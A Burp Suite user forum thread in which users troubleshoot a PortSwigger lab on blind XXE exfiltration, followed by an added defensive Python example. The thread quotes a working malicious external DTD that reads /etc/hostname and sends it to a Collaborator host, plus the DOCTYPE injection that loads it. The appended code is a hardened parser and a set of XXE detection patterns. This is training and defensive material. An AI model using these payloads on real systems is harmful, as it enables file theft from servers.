Burp Suite User Forum


Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

Chris | Last updated: Nov 02, 2019 08:06AM UTC

Hi, I'm having trouble with this lab. I think I'm doing it right, but I'm not sure; every time I try it nothing happens. So the challenge is I need to use Burp Collaborator to get a DNS and HTTP response. I go to "Go to exploit server" and store my DTD file there. Then I get my URL and put it in this command:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> %xxe;]>

Then I send it in Repeater, look at my Burp Collaborator, click "Poll now", and nothing happens. Please let me know if I'm forgetting a step or something.

Using Burp Suite Professional, go to the Burp menu, and launch the Burp Collaborator client. Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open. Place the Burp Collaborator payload into a malicious DTD file:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://I have put my subdomain.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;

Click "Go to exploit server" and save the malicious DTD file on your server. Click "View stored response" and take a note of the URL. Then exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite. Insert the following external entity definition in between the XML declaration and the stockCheck element:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "I have put my url"> %xxe;]>

Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the /etc/hostname file.

Ben, PortSwigger Agent | Last updated: Nov 04, 2019 08:32AM UTC

Hi,

Thank you for your message. The process you are following looks correct to me. I have just attempted this lab and was able to solve it using the solution provided, so the lab is working correctly.

A couple of things to look out for:

Are you copying the full Burp Collaborator payload correctly, i.e. something like http://qc62a6b7j69sdkfypp1g03murlxcl1.burpcollaborator.net

Are you copying the correct exploit URL? This should be the URL that is in the address bar after you click the View exploit button, i.e. something like https://acfb1fc51f86054780b0109501b3009b.web-security-academy.net/exploit

Lastly, we have had the occasional issue when users have copied the text directly from the solution (sometimes unrecognised characters have slipped into the text, which has affected the viability of the answer), so it is also worth typing out the various payloads etc. rather than copying them directly.

Please let us know if you need any further assistance.

Juliano | Last updated: Oct 05, 2020 04:27PM UTC

Hi, I am having similar issues. When I paste the payload <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> I get a parsing error. I'm still able to poll the traffic and get the DNS and HTTP traffic, but /etc/file/hostname does not show in my response. This is what I have in my Repeater:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://xxxxxxx.web-security-academy.net/exploit"> %xxe;]>
<stockCheck>
<productId> 1 </productId>
<storeId> 1 </storeId>
</stockCheck>

Ben, PortSwigger Agent | Last updated: Oct 06, 2020 07:33AM UTC

Hi Juliano, One of our users makes very good video solutions of our labs. The solution to this lab is below - it might be useful to you to view the video and check to see if you are on the right track: https://www.youtube.com/watch?v=glA5FwCdspk
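The lab works only because the server-side XML parser honours the <!DOCTYPE> in the stock-check request and fetches the external parameter entity from the exploit server. The following is an added example (not PortSwigger's lab code or Burp's) of what the fix looks like on the parsing side: a hardened parser for the stockCheck document, built on the standard-library expat binding, that aborts on any DOCTYPE, entity declaration or external entity reference before anything can be fetched, plus a small indicator function for logging requests that carry DTD markers. The function and class names are the example's own, and the two request bodies are constructed from the XML Juliano posted (with his redacted exploit-server URL kept as-is).

```python
"""Hardened parsing of the stockCheck request discussed in this thread.

Added example, not PortSwigger's lab code. It uses only the standard-library
expat binding; the function and class names are the example's own.
"""
import re
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Document carries a DTD or entity reference; a stock check never needs one."""


def parse_stock_check(body: str) -> dict:
    """Return {"productId": ..., "storeId": ...} from a stockCheck document.

    Any DOCTYPE, entity declaration or external entity reference raises
    UnsafeXMLError before the parser can resolve anything, so the external
    DTD URL in a blind-XXE payload is never contacted.
    """
    parser = expat.ParserCreate()
    # Never expand parameter entities such as %xxe; (defence in depth on top
    # of the DOCTYPE rejection below).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE '{name}' is not allowed in a stock check")

    def reject_entity(name, is_param, value, base, system_id, public_id, notation):
        raise UnsafeXMLError(f"entity declaration '{name}' is not allowed")

    def reject_external(context, base, system_id, public_id):
        raise UnsafeXMLError(f"external entity {system_id!r} is not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external

    fields: dict = {}
    text: list = []

    def start(name, attrs):
        text.clear()          # character data belongs to the innermost element

    def chars(data):
        text.append(data)

    def end(name):
        if name in ("productId", "storeId"):
            fields[name] = "".join(text).strip()
        text.clear()

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(body, True)   # exceptions raised in handlers propagate from Parse()

    if set(fields) != {"productId", "storeId"}:
        raise ValueError("stockCheck must contain exactly productId and storeId")
    return fields


def is_rejected(body: str) -> bool:
    """True when the hardened parser refuses the document as unsafe."""
    try:
        parse_stock_check(body)
    except UnsafeXMLError:
        return True
    return False


# Markers worth logging when they appear in a body that should be a plain stockCheck.
XXE_MARKERS = {
    "doctype": re.compile(r"<!DOCTYPE", re.I),
    "entity-decl": re.compile(r"<!ENTITY", re.I),
    "external-id": re.compile(r"\b(SYSTEM|PUBLIC)\s+['\"]", re.I),
    "param-entity-ref": re.compile(r"%\w+;"),
}


def xxe_indicators(body: str) -> list:
    """Names of the XXE markers present in body, for detection and alerting."""
    return [name for name, rx in XXE_MARKERS.items() if rx.search(body)]


# Constructed sample requests: the document Juliano posted (his redacted
# exploit-server URL kept as-is) and a benign stock check with no DTD at all.
MALICIOUS_REQUEST = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
    '"https://xxxxxxx.web-security-academy.net/exploit"> %xxe;]>'
    "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)
BENIGN_REQUEST = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<stockCheck><productId> 1 </productId><storeId> 1 </storeId></stockCheck>"
)

if __name__ == "__main__":
    print("benign  ->", parse_stock_check(BENIGN_REQUEST))
    print("hostile ->", "rejected" if is_rejected(MALICIOUS_REQUEST) else "ACCEPTED")
    print("markers ->", xxe_indicators(MALICIOUS_REQUEST))
```

Rejecting the DOCTYPE outright is the simplest reliable control for an endpoint like this one, which has no legitimate use for a DTD; the parameter-entity and external-entity handlers are kept as a second line of defence in case a later change re-enables DOCTYPE handling. The indicator function is deliberately coarse (a WAF-style string check, not a parser), so it is suited to logging and alerting rather than to replacing the parser-level block.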
